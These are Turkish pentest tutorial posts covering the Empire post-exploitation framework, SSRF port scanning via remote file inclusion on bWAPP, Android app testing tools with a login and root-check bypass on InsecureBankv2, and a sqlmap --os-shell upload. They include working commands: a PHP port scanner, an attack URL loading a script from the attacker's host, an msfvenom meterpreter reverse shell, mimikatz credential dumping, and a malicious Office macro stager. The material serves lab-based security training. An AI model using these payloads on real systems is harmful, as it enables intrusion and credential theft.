Genel yapı olarak listeners, stager ve  module  bulunmaktadır. Bunların parametrelerini set ve unset ile düzenleyip execute komutu ile çalıştırabilmekteyiz. Stager’i kullanabilmek için bir listener seçmeli ve onu çalıştırmalıyız. Parametre olarak listener istemektedir. Gelen bağlantıları agents yazarak görebilmekteyiz. help komutu ilede detaylı olarak tüm komutları görebilirsiniz.

Listener başlatmak için : uselistener http_com  diyerek seçilir. info http_com ile parametreler görülmektedir. set ve unset komutları ile parametreleri düzenledikten sonra execute komutu ile listener başlatılır.  Daha sonra listeners komutu ile listenerlar listenebilir.

Agents komutu ile gelen bağlantılar listenebilir. Default olarak kendi agenti bulunmaktadır.

listeners yazıp tab’a basarak tüm listenerları listeleyebiliriz. usestager yazıp tab’a bastığımızda kullanabileceğimiz tüm stagerları görebilmekteyiz. Burada powershell ile bir tane bat dosyası oluşturan  usestager windows/launcher_bat  komutu ile onu seçmekteyiz ve execute komutu ile çalıştırmaktayız. /tmp/launcher.bat adresinde oluşmuştur.

cat /tmp/launcher.bat  komutu ile dosyamızı görüntülüyoruz.

Bu dosyayı sisteme ister bat olarak yükleyip çalıştırabilirsiniz yada benim bu senaryoda file upload zafiyeti bulunan bir yazılıma cmd shell yükleyip web shell üzerinden direk çalıştırarak sistemden empire’a shell alabilirsiniz.

interact E2SPRAVT diyerek gelen bağlantımızdaki shellimize geçebilmekteyiz.

info komutu ile sistem hakkında bilgiler alınabilmektedir. shell yazıp istediğimiz cmd komutunuda çalıştırabilmekteyiz.

usemodule yazıp tab’a bastığımızda post-exploitation için kullanabileceğimiz bir çok modül gelmektedir. usemodule credentials/mimikatz/lsadump   komutu ile modulu seçip execute diyerek mimikatz modulünü çalıştırıyoruz.

Genel olarak Empire’ı kullanarak sistem üzerinden shell alıp post-exploitation modullerini kullandık. İç network tarafında metasploitin meterpreter bağlantılarının güvenlik yazılımları tarafından yakalanmasından dolayı power shell payloadları ile shell alınabilmektedir. Metasploit gibi gelişmiş bir framework değildir. İçinde exploit bulunmamaktadır.

Empire, sosyal mühendislik testleri için zararlı macro payloadı üretmektedir.  usestager windows/macro listener_adi komutu ile stagerı seçip execute  ile çalıştırıldığında /tmp/macro nun altında çalışmaktadır. Bu payloadı office yazılımlarına (word,excel) yapıştırıp karşı tarafta çalıştırıldığında listenerımıza bağlantı gelmektedir. Agents komutu ile gelen bağlantıları görüp interact ile geçiş yapılabilirsiniz.

TR | Empire Post Exploitation Araç Kurulumu ve Kullanımı Ahmet Gürel

Server Site Request Forgery, Sunucu Taraflı İstek Sahteciliği olarak türkçeye çevrilebilenceğimiz bir açıklıktır.
Sunucu Taraflı İstek Sahteciliği veya SSRF, bir saldırganın bir sunucuyu kendisi adına istekte bulunmaya zorlayan bir güvenlik açığıdır.
Biraz daha açacak olursak bir saldırganın güvenlik açığından etkilenen sunucuya gelen istekleri oluşturmak veya denetlemek için web uygulamasında kullanılan bir parametreyi değiştirmesine olanak verir.
Bir web uygulamasındaki bilgiler, başka bir web sitesinden gelen harici bir kaynaktan alınmak zorundaysa, sunucu tarafı istekleri kaynağı alıp web uygulamasına dahil etmek için kullanılır. Bu şekilde sunucuda kendi isteklerimizi çalıştırabildiğimizde açıklıktan etkinlenen sunucu ve sunucunun bulunduğu networkde büyük risk oluşturabilmektedir. Zafiyetten eetkilenen sunucuyu proxy olarak kullanarak internal network e erişim sağlayabilriz. SSRF kullanarak Cross Site Port Attack (XSPA) saldırısı yapmamıza olanarak sağlamaktadır.
Cross Site Port Attack (XSPA) ile etkilenen sunucu bulunduğu internal networkdeki sunuculara port taraması yapabiliriz.

SSRF saldırıları kullanarak şunları yapmak mümkündür:

• Sunucu(lar)daki dosyaları okuma
• Normal olarak erişilemeyen iç ağdaki tarama ve saldırı sistemleri
• Bu ana makinelerde çalışan hizmetleri numaralandırmak ve saldırmak
• Host-Based tabanlı kimlik doğrulama hizmetlerinden faydalanarak authentication bypass

Bunlardan bir kaçıdır.

Zafiyeti kısaca değindik neden kaynaklandığını, neler yapabileceğinizi artık biliyorsunuz. Gelelim şimdi bWAPP (buggy web application)  üzerinden küçük bir SSRF demosuna.

bWAPP üzerinde SSRF Sekmesinde bu zafiyeti RFI sekmesi üzerinden SSRF kullanarak Port taraması yapmamızı istemekte. Port scan kısmına tıklarsanız size bu işlemi yapabilecek php kodlarını vermektedir. İsterseniz o url üzerindende tetikleyebilirsiniz. Fakat kendiniz o dosyayı indirip kendi atacker ipnizden ya da bir site üzerine yükleyerek tetikleyebilirsiniz.

Port scan sözcüğünün üzerine tıkladığınız açılan sayfa bu şekildedir. Şimdi bu kodu kopyalayarak atak yaparken kullanacağınız pc nin Desktop ına dosya oluşturarak yapıştırınız.

<?php


if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "<span style=\"color:green\">OK</span><br/>";

        }

        else
        {

            echo "<span style=\"color:red\">Inaccessible</span><br/>";

        }

    }

}
?>

Benim düzenlediğim dosya burada bWAPP üzerindeki dosyada XSS payloadıda bulunmaktaydı fakat onu çıkarttım denemek isteyenler o satırı ekleyebilirler. Şimdi bu kodu masaüstümüzde ssrf.txt adında bir dosya açıp içine yapıştırıyoruz.

Burda gördüğünüz işlem kendi makinamın Desktop dizinini kendi ip adresim üzerinden 8000 portu ile dışarıya açmama yarayan komuttur.

 python -m SimpleHTTPServer PortNo

şeklindedir.

Artık gelelim SSRF açığını kullanarak port tarama saldırımıza.

http://192.168.2.35/bWAPP/rlfi.php?language=lang_en.php&action=go  normal  urlimizi bu fakat biz bu urlde language parametresinde biraz önce düzeltiğimiz ve yayına açtığımız ssrf.txt dosyasının urlini giriyoruz. Ve bunun önüne kendimiz bir ip parametresi tanımlıyoruz ve portlarını taranacak ip adresini giriyoruz.Bu ip adresi bWAPP ın kurulu olduğu sunucunun ipsi bu örneğimizde. Gördüğünüz gibi atak başarılı bir şekilde gerçekleşti ve port tarama sonuçları önümüze geldi. http://192.168.2.35/bWAPP/rlfi.php?ip=192.168.2.35&language=http://192.168.2.228:8000/ssrf.txt&action=go

Bu şekilde SSRF açıklığı bulunan bir sistemte proxy olarak kullanarak internal networke ulaşıp oradada keşif ve port taraması yapabilmek mümkündür. Başka bir yazıda görüşmek üzere.

Referanslar:

http://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/
https://securingtomorrow.mcafee.com/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers/

SSRF Cheatsheet : https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit

TR | SSRF ( Server Side Request Forgery ) Zafiyeti Ahmet Gürel

Bu yazıda Android uygulamalarda Mobil Sızma Testinde  kullanılan araçlardan bahsedeceğim. Araçlara geçmeden önce Android dünyasını tanıyalım. Android cihazlarda uygulamaların çalışabilmesi için .apk uzantılı dosyalar ile uygulamalar yüklenir ve cihazlara dağıtabilir. Günümüzde Native ve  Hybrid uygulamalardan söz edilmekte. Native uygulama dediğimiz C++ veya Java dilini temel alan Android ile yazılan uygulamalar Native fakat HTML,CSS, JavaScript tabanlı kodu yazıp bir çok platforma çıktı veren frameworkler ile geliştirildiğinde Hybrid uygulama olarak geçmektedir.

Şimdi gelelim sızma testine, yazılmış bir uygulama apk haline getirildikten sonra android cihazlarda çalışmaya başlar. Bu çalışan uygulamada güvenlik testlerinde kullanılan popüler araçlar vardır. Bunlardan bazılarını şimdi uygulamalı olarak gerçekleştireceğiz.

Bu araçları anlatırken kendim farklı platformlar ve işletim sistemleri kullanacağım sizde kendinize istediğiniz gibi bir test ortamı kurabilirsiniz. İster ana makineniz üzerine bu araçları kurarsınız isterseniz sanal bir cihaz üzerine kurarsınız karar sizin. Fakat bunun dışında testi gerçek bir cihaz ile yapmayacaksanız Android Emulator kurmalısınız. Ben Genymotion  kullanacağım. Genymotion üzerine istediğiniz bir cihaz kurup konfigürasyonunu yapabilirsiniz. Fakat başlangıç için benim size önerim MobSF VM 0.3 ova dosyası. MobSF VM dosyasını indirip VirtualBox ile açarak rootlu hazır bir test cihazı elde edebilirsiniz. Bu yazıda ben de onu kullanacağım.

MobSF VM imizi import edip çalıştırdığımızda böyle bir sayfa ile karşılaşıyoruz. Default parolası 1234 tür.

Araçları öğrenirken örnek bir apk dosyasına ihtiyacımız var. Bunun içinde InsecureBankv2 uygulamasının apk sını kullanacağız. Apk dosyasını Genymotion üzerine sürükleyerek atabilirsiniz.

Kullanılan araçların hepsini tek tek kurmaya üşenirseniz birçok aracı barındıran San Toku veya Vezir Project adlı VM leri indirip hazır olarak kullanabilirsiniz. Bu sanal makineler  Mobile Security için hazırlanmıştır.

San Toku:

Vezir Project : 

Şimdi apk dosyamızı indirdik ve Genymotion’ ın üzerine sürükleyerek apk mızı yükledik.

Şimdi Android cihazımızda uygulama dosyalarına bir göz atalım. Uygulama dosyalarını /data/data nın altında görebilmekteyiz.

Görüldüğü gibi veritabanı dosyaları, uygulamanın kullandığı kütüphaneler ve paylaşımlı dosyalarının klasörlerini gördük. Bunlar mobil uygulama testlerinde önemlidir.

MobSF VM i kullanmamızdaki en büyük rahatlık hazır bir test ortamı sağlamasıydı. Rootlu bir cihaz olması içinde Xposed  Modüllerinin kurulu gelmesi işimizi hızlandırıyor.

Xposed Modülleri ne işe yarar ?

Xposed Modülleri Android cihazda uygulamaları özelleştirmek değiştirmek için kullanılır. Uygulama geliştirilirken yazılan kontrollerin, izinlerin değiştirilmesine imkan verebiliyor. Mesela yukarıda gördüğümüz RootCloak modülü bir uygulama cihaz root lumu diye kontrol edip, çalışmıyorsa bu kontrolü engelleme/atlatmaya yaramaktadır ve güvenlik testleri için önemli bir yer tutmaktadır. Bunun gibi birçok modül bulunmaktadır.

1- ADB 

Simülatör (sanal cihaz) ya da bilgisayarınıza bağlı gerçek cihazınızla iletişim kurulmasını sağlar. Bu sayede bağlanılan cihazı komut satırında kullanabilir, dosya yükleyebilir, cihaz içinden dosya çekebilir, hatta uygulama içinde bulunan Activityleri çalıştırabiliriz. Temel kullanımı aşağıdaki gibidir. canyoupwnme.apk dosyasını yükledik. InsecureBankv2 uygulamasının veritabanı dosyasını çektik ve adb shell komutu ile cihazımızın komut satırına düştük. Daha detaylı adb için tıklayınız.

2- APKTool 

APKTool apk dosyalarını decompile ederek smali kodlarına dönüştürür. İndirmek için tıklayınız. Kullanımı oldukça basit aşağıdaki resimde görüldüğü üzere b parametresi ile decompile etmekte.

3- Dex2Jar

Adından da anlaşılacağı üzere dex dosyalarını jar dosyalarına çevirmektedir. Resimde görüldüğü üzere apk dosyamızı jar haline getirdik.

4- JD-GUI

JAR haline getirdiğimiz dosyamızı görüntülemek için kullanacağız.

5- AndroGuard 

AndroGuard python ile geliştirilen statik kod analizi  yapan bir araçtır. San Toku nun içinde kurulu olarak gelmektedir. Kendiniz indirmek isterseniz tıklayınız. Tüm parametreler ve kullanımı için tıklayınız.

AmdroGuard Santoku üzerinde bu şekilde çalıştırılmaktadır. İlk olarak kurulu olduğu dizine gittik ve apk dosyamızı da oraya taşıdık. ./androlyze.py -s ile çalıştırdık. İlk satırımıza  a,d,dx= AnalyzeAPK(“Insecurebankv2.apk”, decompiler=”dad”) komutunu yazarak apk dosyamızı göstererek decompile ediyoruz. Daha sonra programın parametreleri ile birçok analiz edebilmekteyiz. Resimde uygulamanın activitylerini ve izinlerini getirdik.

6- Burp Suite

Tabii ki efsane aracımız Burp Suite ? Burp gelişmiş bir proxy yazılımıdır. Bunun dışında birçok teste yardımcı olmakta ve imkan tanımaktadır. Web Testlerinin olmazsa olmazı Burp Mobil testlerimizde de o kadar önemli. Şimdi Burp Suite Emulatorümüzden bağlanmayı bakalım beraber.

Ayarlara ( Settings) e girerek daha sonra Wi-Fi ye tıklayarak WiredSSID nin üzerine basılı tutarak Modify network diyerek Proxy belirliyoruz. Burada IP adresi test yaptığınız makinenin IPsidir kendi ana makineniz ya da yukarıda bahsettiğim makinelari indirdiyseniz onun IP adresidir.

Burp Suite açarak, Proxy’e tıklayıp, oradan Options sekmesine gelip, Add e basıyoruz ve resimdeki gibi kendi IP adresinizi ve port numaranızı giriyorsunuz.

Artık Burp Suite hazır mobil testimizde kullanabilirsiniz. Resimde gördüğünüz gibi emulatordeki isteği yakalamakta.

7- Sqlite Veritabanı incelemede Sqlite Browser ve Sqlite3 Kullanımı

Uygulamayı cihazımıza aktardıktan sonra veritabanı dosyalarını yukarıda ADB ile kendi bilgisayarımıza indirmiştik. Bu database dosyalarının içeriğini Sqlite Browser ile görüntüleyebiliriz. Bunun dışında da Sqlite3 ile veritabanını seçerek sorgular yazıp bununla da görüntüleyebilmekteyiz.

Bilgisayarımıza indirdiğimiz database dosyasının Sqlite Brower ile incelenmesi yukarıdaki gibidir. Grafiksel arayüzü vardır ve oldukça kolay bir kullanıma sahiptir.

sqlite3 de ise consol üzerinden işlem yapılmaktadır. Boşluk bırakıp database dosyamızı vererek çalıştırıyoruz. Daha sonra .tables sorgusu ile veritabanı tablolarını getirebiliriz. Seçilen tabloda istediğimiz gibi sorgular çalıştrabilmekteyiz. Database dosyası şimdilik boş olduğu için hiç bir names tablosundan veri gelmedi.

8- AndroBugs Framework

AndroBugs Framework, Android uygulamalarda güvenlik testi gerçekleştiren frameworklerden bir tanesidir. Buraya tıklayarak kaynak kodlarına ve buradan da sitesine ulaşabilirsiniz.

Kullanımı oldukça basittir. Konsol üzerinden biz androbugs -f apk_dosyasi şeklinde kullanarak frameworkumuzu çalıştırdık. Bunun sonucunda kendi klasörünün altında Reports klasörünün altında detaylı rapor oluşturmaktadır.

9- Mobile Security Framework (MobSF) 

AndroBugs gibi  MobSF de mobil uygulama analizi yapan bir frameworktur. Şu an en kullanışlı ve sağlam araç denebilir. Oldukça popüler ve güzel bir araçtır. Yazının başında da zaten MobSF in Android Ova sını kullanmıştık. Buraya tıklayarak MobSF in Github sayfasına ulaşabilirsiniz. MobSF i indirdikten sonra Windows, Linux ve OSX e kurabilirsiniz. Kurulum dökümantasyonu için tıklayınız. Kurduktan sonra localhostunuzda tarayıcıda çalışmakta ve apk dosyasını seçerek direk çalışmakta. Oldukça basit bir kullanımı vardır. Adres olarak 127.0.0.1:8000 adresinde çalışmaktadır.

Kurduktan sonra açılışta önümüze gelen MobSF giriş sayfası budur. Bizden analiz edilecek uygulamamızı istemekte.

Uygulamayı verdikten sonra analize başlıyor ve bittiğinde önümüze sonuçları getiriyor.

10- Drozer 

Drozerda mobil testlerde kullanılan dinamik analiz yapan bir frameworktur. Uygulama çalışırken test etme imkanı verir. Diğer AndroBugs ve MobSF de ise statik analizi yaptık fakat uygulama çalışmıyordu. Drozer’da uygulama çalışırken testlerimizi gerçekleştiriyoruz. Drozer’ı kendi test pc nize kurduktan sonra aynı zamanda emulatordeki mobil cihaza da yükleyerek birbirleri ile haberleşmesini sağlıyoruz. Buraya tıklayarak kaynak kodlarına ve kurulumuna ulaşabilirsiniz. Kendi test pc nize drozeri kurduktan sonra agent.apk yı emulatore atmayı unutmayınız. Bunu ister sürükle bırak ile istersenizde adb. install agent.apk komutu ile yapabilirsiniz. Yükledikten sonra agent.apk yı emulatorde açarak off dan on a alınız. Daha sonra kurulum sayfasında gösterdiği gibi adb  forward tcp:31415 tcp:31415 komutunu verip drozer console connect diyerek drozerin komut satırına düşebilirsiniz.

run app.package.list -f insecurebank komutu ile kurulu paketler arasında adı insecurebank olan paketi arıyoruz.

Yukarıdaki resimlerde gördüğünüz run app.package.info -a  com.android.insecurebankv2 komutu ile paket bilgilerini getirdik. Bulunduğu dizin, izinleri gibi bilgiler geldi.

Gördüğünüz gibi drozer çok gelişmiş bir araç. Birçok modülü ve komutu var. Bunların tamamına buraya tıklayarak ulaşabilirsiniz.

Mobil (Android) sızma testi hakkında elimden geldiğince temel bilgiler vermeye, en çok kullanılan 10 aracı size tanıtmaya ve temel kullanımını anlatmaya çalıştım. Mobil güvenlik ve diğer birçok aracın tam listesine https://mobilesecuritywiki.com/ adresinden ulaşabilirsiniz.

Bonus:

Şimdi yukarıda örnek olarak Insecurebankv2 uygulamasını baz aldık ve her araçta bunu çalıştırdık. Bu çalışmalar sırasında birçok bilgi edindik. AndroGuard ile activityleri getirdiğimizde tüm aktivityleri gördük. Burada com.android.insecurebankv2.PostLogin adındaki activity dikkatimizi çekti. Bunu direk çalıştırdığımızda bize girişte sorulan username ve password kısmını geçerek uygulama bizi karşılayacaktır.

Drozer in komut satırında run app.activity.start –component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin komutunu çalıştırdığımızda dediğimiz işlemi gerçekleştirmiş oluyoruz.

Evet gördüğünüz üzere login ekranını geçerek uygulamamız açıldı. Fakat uygulama cihazın rootlu olup olmadığını kontrol ediyormuş ve bizim cihazımızı yakaladı. Rootlu olarak bunun için yazının başında bahsettiğim Xpossed modüllerinden RootCloak ı kullanacağız.

Buradan Add/Remove Apps diyerek Insecurebankv2 uygulamasını seçmemiz gerekmekte.

Ve uygulamamızı bi daha açtığımızda gördüğünüz gibi Cihaz Rootlu değil diyor yani bypasslamış olduk.

Bu activity i drozer ile çalıştırdığımız gibi ADB  ile de çalıştırabiliriz. adb.exe shell am start -n  com.android.insecurebankv2/com.android.insecurebankv2.PostLogin komutu ile aynı işlemi gerçekleştirebiliyoruz.

Başka bir yazıda görüşmek üzere ?

TR | Mobil (Android) Sızma Testine Giriş Ahmet Gürel

Bu yazıda SQL Injection kullanarak  Sqlmap ile shell yükleyerek sisteme sızacağız. Bunun için Kali Linux,Burpsuite,Sqlmap ve bWAPP (Web Açıklıkları Bulunan Sistem) i kullanacağım.

bWAPP ı https://sourceforge.net/projects/bwapp/ adresinden indirerek sanal makinanızda ayağa kaldırıp ip adresi ile tarayıcınız üzerinden erişebilirsiniz. Ulaştığınızda kullanıcı adı : bee şifresini : bug olarak girdiğinizde uygulamaya giriş yapacaksınız. Burada bir çok web uygulama açıklıkları bulunmakta. Biz sqli kullanarak shell yükleyeceğiz.

Burpsuite i açarak uygulamızıda açıyoruz ‘ işareti ile kontrol ettiğimizde resimdeki gibi sqli olduğuna dair bizi mutlu eden hatayla karşılaşıyoruz. Aynı zamanda burp ilede cookiemize ulaşabiliyoruz.

Daha sonra  sqlmap ile url ve cookie mizi aşağıdaki parametrelerle birlikte –os-shell ekleyerek çalıştırıyoruz.

sqlmap -u "http://192.168.237.135/bWAPP/sqli_1.php?title=%C4%B1ronman&action=search" --cookie="security_level=0; PHPSESSID=4e4cf5609dfa54a19f3ee164c8d21f75" --os-shell

Sqlmap komutumuzu çalıştırdığımızda bize yukarıdaki gibi hedef sistemin dilini soruyor bu yazılım için php yani 4 diyerek devam ediyoruz.

Daha sonra dosyamızın nereye yükleneceğini soruyor burada 1 i seçerek devam ediyoruz.

Daha sonra dosyamızın yüklendiği adresleri yukarıda gördüğünüz gibi göstermekte.

192.168.237.135/tmpuidmm.php adresine gittiğimizde  shellimizi yükleyebileceğimiz bir sayfa gelmekte.

Buraya kendi shelliniz varsa onuda yükleyebilirsiniz yada msfvenom ile oluşturabilirsiniz.

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f raw > shell.php

Oluşturduğumuz shell.php yi sisteme yüklüyoruz.

Gördüğünüz gibi dosya yüklendi diyor. Buradan metasploit i açarak multi/handler ı çalıştıracağız.

Payloadımızı oluştururken girdiğimiz ip ve portları girerek multi/handler ı çalıştırıyoruz. Ve sonra tarayıcımızdan 192.168.237.135/shell.php yi açıyoruz.

Görüldüğü gibi meterpreter satırına düşmüş bulunmaktayız.

Bu yazıda değineceklerim bu kadar başka bir yazıda görüşmek üzere

TR | SQL Injection Kullanarak Sqlmap ile Shell Yükleme Ahmet Gürel